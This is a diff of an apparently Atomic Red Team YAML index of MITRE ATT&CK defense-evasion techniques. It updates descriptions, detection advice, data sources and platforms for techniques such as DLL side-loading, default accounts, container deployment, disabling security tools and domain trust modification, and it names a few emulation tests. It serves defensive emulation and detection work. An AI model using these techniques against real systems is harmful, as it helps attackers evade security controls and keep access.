@@ -28955,35 +21043,25 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DLL Side-Loading description: |- - Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. + Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). - Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - - Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process. + Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. 
Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:27.807Z' - created: '2020-03-13T19:41:37.908Z' x_mitre_defense_bypassed: - Anti-virus - Application control - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_detection: Monitor processes for unusual activity (e.g., a process that - does not use the network begins to do so). Track DLL metadata, such as a hash, - and compare DLLs that are loaded at process execution time against previous - executions to detect differences that do not correlate with patching or updates. + does not use the network begins to do so) as well as the introduction of new + files/programs. Track DLL metadata, such as a hash, and compare DLLs that + are loaded at process execution time against previous executions to detect + differences that do not correlate with patching or updates. x_mitre_data_sources: - - Loaded DLLs - - Process monitoring - - Process use of network + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' x_mitre_platforms: - Windows identifier: T1574.002 
@@ -29035,15 +21113,22 @@ defense-evasion: url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. - source_name: Metasploit SSH Module url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. + description: Metasploit. (n.d.). Retrieved April 12, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Default Accounts description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. 
Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d @@ -29057,9 +21142,9 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' + modified: '2021-04-05T20:14:26.846Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator 
@@ -29069,20 +21154,18 @@ defense-evasion: for default credentials or SSH keys, and if any are discovered, they should be updated immediately. x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers identifier: T1078.001 atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges 
@@ -29151,25 +21234,20 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:55:23.113Z' + modified: '2021-03-08T10:33:02.083Z' created: '2020-06-16T17:23:06.508Z' x_mitre_detection: |- The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity. In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs) x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_version: '1.0' + - 'Instance: Instance Deletion' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1140: technique: @@ -29213,9 +21291,9 @@ defense-evasion: - Matthew Demaske, Adaptforward - Red Canary x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'File: File Modification' + - 'Script: Script Execution' x_mitre_defense_bypassed: - Anti-virus - Host intrusion prevention systems 
@@ -29276,6 +21354,76 @@ defense-evasion: del %temp%\T1140_calc2.txt >nul 2>&1 del %temp%\T1140_calc2_decoded.exe >nul 2>&1 name: command_prompt + T1610: + technique: + external_references: + - source_name: mitre-attack + external_id: T1610 + url: https://attack.mitre.org/techniques/T1610 + - source_name: Docker Containers API + url: https://docs.docker.com/engine/api/v1.41/#tag/Container + description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container. + Retrieved March 29, 2021. + - source_name: Kubernetes Dashboard + url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/ + description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). + Retrieved March 29, 2021. + - source_name: Kubeflow Pipelines + url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/ + description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. + Retrieved March 29, 2021. + - source_name: Aqua Build Images on Hosts + url: https://blog.aquasec.com/malicious-container-image-docker-container-host + description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building + Malicious Images on Your Hosts. Retrieved March 29, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Deploy Container + description: |- + Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. 
+ + Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) + id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-14T12:02:20.641Z' + created: '2021-03-29T16:51:26.020Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + - root + x_mitre_remote_support: true + x_mitre_detection: Monitor for suspicious or unknown container images and pods + in your environment. Deploy logging agents on Kubernetes nodes and retrieve + logs from sidecar proxies for application pods to detect malicious activity + at the cluster level. In Docker, the daemon log provides insight into remote + API calls, including those that deploy containers. Logs for management services + or applications used to deploy containers other than the native technologies + themselves should also be monitored. 
+ x_mitre_contributors: + - Pawan Kinger, @kingerpawan, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Center for Threat-Informed Defense (CTID) + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Container: Container Start' + - 'Pod: Pod Creation' + - 'Pod: Pod Modification' + - 'Application Log: Application Log Content' + atomic_tests: [] T1006: technique: id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5 @@ -29303,7 +21451,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-01-30T22:27:39.932Z' + modified: '2021-02-09T14:09:00.753Z' created: '2017-05-31T21:30:20.934Z' x_mitre_is_subtechnique: false x_mitre_platforms: 
@@ -29313,12 +21461,13 @@ defense-evasion: x_mitre_detection: |- Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy) - Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended. + Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended. x_mitre_defense_bypassed: - File monitoring - File system access controls x_mitre_data_sources: - - API monitoring + - 'Command: Command Execution' + - 'Drive: Drive Access' x_mitre_version: '2.0' identifier: T1006 atomic_tests: @@ -29392,9 +21541,9 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-19T16:31:34.489Z' + modified: '2021-03-15T16:43:04.273Z' created: '2020-10-12T13:52:32.846Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User 
@@ -29406,19 +21555,18 @@ defense-evasion: Additionally, a sudden loss of a log source may indicate that it has been disabled.' x_mitre_data_sources: - - AWS CloudTrail logs - - Azure activity logs - - GCP audit logs + - 'Cloud Service: Cloud Service Modification' + - 'Cloud Service: Cloud Service Disable' x_mitre_contributors: + - Syed Ummar Farooqh, McAfee + - Prasad Somasamudram, McAfee + - 'Sekhar Sarukkai, McAfee ' - Ibrahim Ali Khan - - AttackIQ + - Alex Soler, AttackIQ - Janantha Marasinghe - - 'Sekhar Sarukkai; Prasad Somasamudram; Syed Ummar Farooqh (McAfee) ' - Matt Snyder, VMware x_mitre_platforms: - - GCP - - Azure - - AWS + - IaaS atomic_tests: [] T1600.002: technique: @@ -29446,7 +21594,7 @@ defense-evasion: modified: '2020-10-21T22:37:48.503Z' created: '2020-10-19T19:11:18.757Z' x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network x_mitre_detection: There is no documented method for defenders to directly identify @@ -29493,9 +21641,8 @@ defense-evasion: x_mitre_detection: Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious. x_mitre_data_sources: - - Process monitoring - - Windows event logs - - Process command-line parameters + - 'Sensor Health: Host Status' + - 'Command: Command Execution' x_mitre_platforms: - Windows identifier: T1562.002 
@@ -29610,25 +21757,21 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T20:02:24.426Z' + modified: '2021-03-08T10:33:02.146Z' created: '2020-06-24T16:55:46.243Z' x_mitre_contributors: - Expel x_mitre_detection: Monitor cloud logs for modification or creation of new security groups or firewall rules. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs + - 'Firewall: Firewall Rule Modification' + - 'Firewall: Firewall Disable' x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1562.004: technique: @@ -29661,9 +21804,10 @@ defense-evasion: x_mitre_detection: Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls. x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Windows Registry + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Modification' + - 'Firewall: Firewall Disable' + - 'Firewall: Firewall Rule Modification' x_mitre_platforms: - Linux - macOS 
@@ -29778,22 +21922,6 @@ defense-evasion: elevation_required: true T1562.001: technique: - created: '2020-02-21T20:32:20.810Z' - modified: '2020-03-29T21:52:43.151Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579 - description: Adversaries may disable security tools to avoid possible detection - of their tools and activities. This can take the form of killing security - software or event logging processes, deleting Registry keys so that tools - do not start at run time, or other methods to interfere with security tools - scanning or reporting information. - name: Disable or Modify Tools - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1562.001 
@@ -29801,30 +21929,54 @@ defense-evasion: - external_id: CAPEC-578 source_name: capec url: https://capec.mitre.org/data/definitions/578.html - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_data_sources: - - Process command-line parameters - - Windows Registry - - Services - - File monitoring - x_mitre_detection: Monitor processes and command-line arguments to see if security - tools are killed or stop running. Monitor Registry edits for modifications - to services and startup programs that correspond to security tools. Lack of - log events may be suspicious. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Disable or Modify Tools + description: Adversaries may disable security tools to avoid possible detection + of their tools and activities. This can take the form of killing security + software or event logging processes, deleting Registry keys so that tools + do not start at run time, or other methods to interfere with security tools + scanning or reporting information. + id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-19T13:41:17.746Z' + created: '2020-02-21T20:32:20.810Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator x_mitre_defense_bypassed: - Anti-virus - Log analysis - Signature-based detection - Host intrusion prevention systems - File monitoring - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_detection: Monitor processes and command-line arguments to see if security + tools are killed or stop running. Monitor Registry edits for modifications + to services and startup programs that correspond to security tools. Lack of + log events may be suspicious. 
+ x_mitre_data_sources: + - 'Process: Process Termination' + - 'Windows Registry: Windows Registry Key Modification' + - 'Windows Registry: Windows Registry Key Deletion' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Sensor Health: Host Status' + x_mitre_platforms: + - Windows + - macOS + - Linux + - Containers + - IaaS + x_mitre_contributors: + - Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security + - Nathaniel Quist, Palo Alto Networks + - Gal Singer, @galsinger29, Team Nautilus Aqua Security identifier: T1562.001 atomic_tests: - name: Disable syslog @@ -30424,8 +22576,8 @@ defense-evasion: Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. x_mitre_data_sources: - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: - Linux - macOS @@ -30468,12 +22620,15 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-08-26T14:16:48.125Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:10:26.613Z' created: '2020-02-11T19:05:02.399Z' x_mitre_data_sources: - - Authentication logs - - API monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' x_mitre_permissions_required: - Administrator x_mitre_detection: "Monitor for calls to OpenProcess that can be 
@@ -30490,11 +22645,156 @@ defense-evasion: used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). " - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows atomic_tests: [] + T1484: + technique: + id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d + description: |- + Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. + + With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. 
Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). + + Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators. + name: Domain Policy Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484 + url: https://attack.mitre.org/techniques/T1484 + - source_name: ADSecurity GPO Persistence 2016 + url: https://adsecurity.org/?p=2716 + description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence + #17: Group Policy. Retrieved March 5, 2019.' + - description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and + OUs. Retrieved March 5, 2019. + url: https://wald0.com/?p=179 + source_name: Wald0 Guide to GPOs + - source_name: Harmj0y Abusing GPO Permissions + url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ + description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved + March 5, 2019. + - source_name: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. 
(2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Microsoft 365 Defender Solorigate + url: https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ + description: Microsoft 365 Defender Team. (2020, December 28). Using Microsoft + 365 Defender to protect against Solorigate. Retrieved January 7, 2021. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:52:24.598Z' + created: '2019-03-07T14:10:32.650Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_version: '2.0' + x_mitre_detection: |- + It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate) + x_mitre_defense_bypassed: + - System access controls + - File system access controls + x_mitre_is_subtechnique: false + 
atomic_tests: [] + T1484.002: + technique: + id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee + description: |- + Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. + + Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. + name: Domain Trust Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484.002 + url: https://attack.mitre.org/techniques/T1484/002 + - source_name: Microsoft - Azure AD Federation + url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed + description: Microsoft. (2018, November 28). What is federation with Azure + AD?. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. 
(2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-11T18:21:20.213Z' + created: '2020-12-28T21:59:02.181Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender + x_mitre_detection: |- + Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Monitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: "Federated Domain Name", or Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain) + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + 
x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + atomic_tests: [] T1601.002: technique: external_references: @@ -30543,8 +22843,7 @@ defense-evasion: it may be appropriate to also verify the integrity of the vendor provided operating system image file. ' x_mitre_data_sources: - - Network device configuration - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] 
@@ -30552,11 +22851,9 @@ defense-evasion: technique: id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 description: |- - Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. + Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. - A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X) - - If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. 
+ Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) name: Dylib Hijacking created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: 
@@ -30568,14 +22865,38 @@ defense-evasion: - external_id: CAPEC-471 source_name: capec url: https://capec.mitre.org/data/definitions/471.html + - source_name: Wardle Dylib Hijack Vulnerable Apps + url: https://objective-see.com/blog/blog_0x46.html + description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore + Apps. Retrieved March 31, 2021. + - source_name: Wardle Dylib Hijacking OSX 2015 + url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf + description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved + March 29, 2021. + - source_name: Github EmpireProject HijackScanner + url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py + description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib + Hijack Vulnerability Scanner. Retrieved April 1, 2021. + - source_name: Github EmpireProject CreateHijacker Dylib + url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py + description: Wardle, P., Ross, C. (2018, April 8). 